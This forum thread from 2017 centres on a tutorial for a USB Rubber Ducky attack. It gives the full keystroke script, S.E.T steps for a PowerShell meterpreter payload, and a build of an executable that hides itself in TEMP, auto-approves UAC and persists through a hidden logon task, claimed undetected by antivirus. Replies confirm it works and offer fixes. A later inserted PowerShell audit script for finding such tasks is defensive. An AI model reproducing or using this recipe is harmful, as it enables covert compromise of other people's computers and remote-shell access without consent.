chaz Posted February 15, 2017

Hi there, I'm new to this forum and so I thought I'd introduce myself with a nice tutorial! :)

I've created a ducky script and coded an executable which will achieve the title of this topic. This will make use of the Twin Duck firmware, so this is a prerequisite before starting unless you can apply the same thing to ducky-decode or similar. Another prerequisite is .NET Framework 4.5, but PCs with Win 8+ will have this by default and loads of applications use this, so the likelihood of a pre-Win 8 PC not having it is fairly low (I might make a native payload later).

What the executable does:
- Checks for specific current privileges, e.g. Admin, Admin user group, non-privileged user.
- Depending on privilege level, either continues execution or attempts to elevate. (If the user is in the admin user group it will display a normal UAC prompt so the ducky script we use later can hit 'ALT Y'.)
- Copies itself and required DLLs to the default TEMP directory, and sets all of those files to be hidden.
- Creates a hidden Task Scheduler task which runs the executable on each user logon.
- Executes an encoded PowerShell payload.

Why smart privilege checking is important:
If a completely non-privileged user were to execute the program and it asked for UAC anyway, then a prompt like this would appear:

This is obviously problematic; in this circumstance we would rather our payload run with normal privileges, because non-privileged access is better than no access, right? This is why I have incorporated the privilege escalation into the executable rather than the ducky script, so this prompt is never displayed and instead we get a normal user-level meterpreter shell.

Now if a user is part of the admin group then we see a dialog like this:

This is where we'd like our ducky script to hit 'ALT Y' and bam! We can then just use meterpreter's 'getsystem' command and we're away!
Tutorial:

What you'll need:
- Windows PC/VM with Visual Studio 2013/2015/2017 installed (free downloads from Microsoft).
- Linux-based PC/VM for generating our payload and listening for connections. Preferably Kali Linux, as we will be using S.E.T (Social Engineering Toolkit) to generate our PowerShell payload.
- USB Rubber Ducky (with Twin Duck or similar firmware installed).
- This Visual Studio project: http://www37.zippyshare.com/v/9GYYXKVl/file.html (On your Windows PC/VM, unzip it beforehand.)

Let's start:
- On the Kali Linux side of things, let's open S.E.T by going to 'Applications' -> 'Social Engineering Tools' -> 'social engineering toolkit'.
- You will be presented with various options; hit '1' and then Enter.
- Again more options; hit '9', or whichever number corresponds to 'Powershell Attack Vectors', and then Enter.
- More options; hit '1' and then Enter.
- Give it your local IP (or external IP if you want a connection from outside your local network; this would require port forwarding).
- Give it a port and then say 'yes' when it asks if you want to start the listener.
- Now type this command (change the path if necessary): 'sudo php -S 0.0.0.0:80 -t /root/.set/reports/powershell/'
- You have just started a web server on port 80. Navigate over there in your Windows PC's web browser with the file name in the path, like so: '192.168.0.XXX/x86_powershell_injection.txt'. You should be faced with this screen:
- Select all the text and copy it.
- Open Visual Studio and click 'Open Project'. Navigate to the 'PSExec' folder that you unzipped and select the Visual Studio solution file:
- Go to the line with the pre-inserted PowerShell payload (Line 64):
- Replace the text within the double quotes with the payload you got from the web server earlier.
- Go to the Build menu at the top and click 'Build Solution'. Make sure the drop-downs below the menu bar say 'Release' and 'Any CPU'; if not, just change them.
- Navigate to the path it gives at the bottom in the console window to find the DLLs and exe file we need.
- Plug your Ducky's micro SD card into your PC and copy the files called 'PSExec.exe', 'Microsoft.Win32.TaskScheduler.dll' and 'JetBrains.Annotations.dll' to your ducky drive.
- Now we need our ducky payload; here is the code:

REM Awesome script
DELAY 500
GUI R
DELAY 50
STRING cmd /k "for /f %a in ('wmic logicaldisk get volumename^,name ^| find "DUCKY"') do start "" %a\PSExec.exe"
DELAY 50
ENTER
DELAY 1500
ALT Y
DELAY 1000
STRING exit
DELAY 50
ENTER
DELAY 50
STRING exit
DELAY 50
ENTER

- Generate your inject.bin file with an encoder.
- Copy the inject.bin to your Ducky's drive and there we have it!

Some caveats:
- The 'PSExec.exe' file is totally undetected by antiviruses, but if an antivirus wants to scan the file before running it, it may interfere with the ducky script.
- Slower PCs may need slightly longer delays in the ducky script, but hey, just experiment until it works!

So tell me what you think; feedback is greatly appreciated!
chaz Posted February 16, 2017

I should add, since we are using Windows Task Scheduler, if we do get elevated privileges, when the user reboots and the 'PSExec.exe' file auto-runs it will run as Admin and no UAC prompt will be shown, because technically when we added the task we were admin :)
ThoughtfulDev Posted February 21, 2017

The payload works (except I had to change the PowerShell execution to use Process, not the Powershell, because Win7 threw an exception right there). I also modified the PSExec a little bit. payload.txt does contain the part after -EncodedCommand, so you can swap the payload easily without needing to recompile the PSExec every time, which may not be possible every time. Thanks, nice idea :) It works as expected; you will get Sys Privs easily (except for Win10, which may be an MSF problem) and the payload stays persistent with SysPrivs after reboot. Nice work ;)
chaz Posted February 21, 2017

3 hours ago, Shonenx333 said:
The payload works (except I had to change the PowerShell execution to use Process, not the Powershell, because Win7 threw an exception right there). I also modified the PSExec a little bit. payload.txt does contain the part after -EncodedCommand, so you can swap the payload easily without needing to recompile the PSExec every time, which may not be possible every time. Thanks, nice idea :) It works as expected; you will get Sys Privs easily (except for Win10, which may be an MSF problem) and the payload stays persistent with SysPrivs after reboot. Nice work ;)

Good to hear! Glad you got it working on Windows 7, and yeah, having the script as an external resource to load at runtime is probably a better idea! Interestingly I had no issues with System Privs and Windows 10; I just executed 'getsystem' in my meterpreter prompt and I got elevated (even after reboot). Thanks for your kind words :)
mrdeep Posted February 22, 2017

This looks solid. I compiled the program and will try it out on my ducky later! A small pro tip: you need to escape quotation marks if they appear in your script. Like so:

pInstance.AddScript("powershell -w 1 -C \"sv SS....

Or it won't compile correctly. Thanks for this. I will update later.
chaz Posted February 22, 2017

1 hour ago, mrdeep said:
This looks solid. I compiled the program and will try it out on my ducky later! A small pro tip: you need to escape quotation marks if they appear in your script. Like so:

pInstance.AddScript("powershell -w 1 -C \"sv SS....

Or it won't compile correctly. Thanks for this. I will update later.

Yeah, definitely, though all the PowerShell scripts that I've generated with S.E.T don't have any quotation marks, but for non-programmers, a very good tip!
henna3 Posted March 1, 2017

Everything works except the persistence. Can't get that to work for some reason. Do you know how to fix this? Nice script though, chaz!!
chaz Posted March 1, 2017

4 hours ago, henna3 said:
Everything works except the persistence. Can't get that to work for some reason. Do you know how to fix this? Nice script though, chaz!!

The reboot persistence? I don't mean that if a session dies it will come back to life; it will just execute again when rebooted. If you could check Task Scheduler to see if a task is created and get back to me, that would be awesome! And thanks btw :)
chaz Posted March 16, 2017

Hopefully this works for everyone!
Thecolorchanges Posted March 17, 2017

This is awesome! Excellent work!
qwe3 Posted April 4, 2017

Sir, I have tried this payload on my computer. Can I please know how to remove the persistence? Thanks!
ThoughtfulDev Posted April 4, 2017

27 minutes ago, qwe3 said:
Sir, I have tried this payload on my computer. Can I please know how to remove the persistence? Thanks!

Go to Windows Task Scheduler and delete the task "Update".
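A defender-side way to find and clean up the persistence this thread describes, as an added example that is not part of chaz's PSExec project or any post here: it lists scheduled tasks whose action runs an executable from %TEMP% or another user-writable location and reports whether the task is hidden, logon-triggered and set to run at highest privilege. The task name 'Update' is taken from ThoughtfulDev's reply above; the watched paths and the function name Find-SuspiciousLogonTasks are my own assumptions.

```powershell
# Added audit script (not part of the thread's PSExec project).
# Flags scheduled tasks whose action runs from a user-writable location such as
# %TEMP%, especially when the task is hidden, triggered at logon and runs elevated.

function Find-SuspiciousLogonTasks {
    param(
        # Locations a legitimate installer rarely uses for a persistent task action (assumed list)
        [string[]]$WatchRoots = @($env:TEMP, $env:LOCALAPPDATA, $env:APPDATA, "$env:SystemRoot\Temp")
    )
    $roots = $WatchRoots | ForEach-Object { [IO.Path]::GetFullPath($_).TrimEnd('\') + '\' }

    foreach ($task in Get-ScheduledTask -ErrorAction SilentlyContinue) {
        foreach ($action in $task.Actions) {
            if (-not $action.Execute) { continue }            # COM handler actions have no Execute
            $exe = [Environment]::ExpandEnvironmentVariables($action.Execute).Trim('"')
            $inWatchedRoot = $roots | Where-Object { $exe.StartsWith($_, 'OrdinalIgnoreCase') }
            if (-not $inWatchedRoot) { continue }

            # The thread's executable marks its dropped files hidden; -Force is needed to see them
            $hiddenFile = (Test-Path -LiteralPath $exe) -and
                ((Get-Item -LiteralPath $exe -Force).Attributes -band [IO.FileAttributes]::Hidden)
            $logon = $task.Triggers | Where-Object { $_.CimClass.CimClassName -eq 'MSFT_TaskLogonTrigger' }

            [pscustomobject]@{
                TaskPath     = $task.TaskPath
                TaskName     = $task.TaskName
                Execute      = $exe
                Arguments    = $action.Arguments
                HiddenTask   = [bool]$task.Settings.Hidden
                HiddenFile   = [bool]$hiddenFile
                LogonTrigger = [bool]$logon
                RunLevel     = $task.Principal.RunLevel     # 'Highest' runs elevated with no UAC prompt
                State        = $task.State
            }
        }
    }
}

# Review the findings first, then remove only what you have confirmed is unwanted:
#   Find-SuspiciousLogonTasks | Format-Table -AutoSize
#   Find-SuspiciousLogonTasks | Where-Object TaskName -eq 'Update' |
#       ForEach-Object { Unregister-ScheduledTask -TaskPath $_.TaskPath -TaskName $_.TaskName -Confirm:$false }
```

Run it from an elevated PowerShell session, since tasks registered by an administrator are not all visible to a limited user; the hidden files in %TEMP% still need to be deleted separately after the task is gone.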
qwe3 Posted April 7, 2017

Thanks, sir. There's one problem: after the PSExec.exe has started, it says Windows PowerShell stopped working.

Output:

1>------ Build started: Project: PSExec, Configuration: Release Any CPU ------
1>C:\Program Files (x86)\MSBuild\12.0\bin\Microsoft.Common.CurrentVersion.targets(1697,5): warning MSB3088: Could not read state file "obj\Release\PSExec.csprojResolveAssemblyReference.cache". Unable to find assembly 'Microsoft.Build.Tasks.Core, Version=14.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a'.
1> PSExec -> C:\Users\xxx\Desktop\PSExec\PSExec\bin\Release\PSExec.exe
========== Build: 1 succeeded, 0 failed, 0 up-to-date, 0 skipped ==========
dacrydium Posted October 16, 2017

Hi, thank you for this project, but the link for the Visual Studio project is dead. Can you reupload it please?
n27 Posted October 17, 2017

On 10/16/2017 at 9:43 AM, dacrydium said:
Hi, thank you for this project, but the link for the Visual Studio project is dead. Can you reupload it please?

q8
ThoughtfulDev Posted October 27, 2017

I don't have the original one, just my modified version from PyDuckGen: Click
The Modern Mind Posted April 6, 2018

I can successfully compile the project using the instructions above. It outputs the file PSExec.exe successfully, yet it doesn't output the files Microsoft.Win32.TaskScheduler.dll and JetBrains.Annotations.dll. Shouldn't they be in the same folder as the newly made PSExec? Anybody still using this method that can help?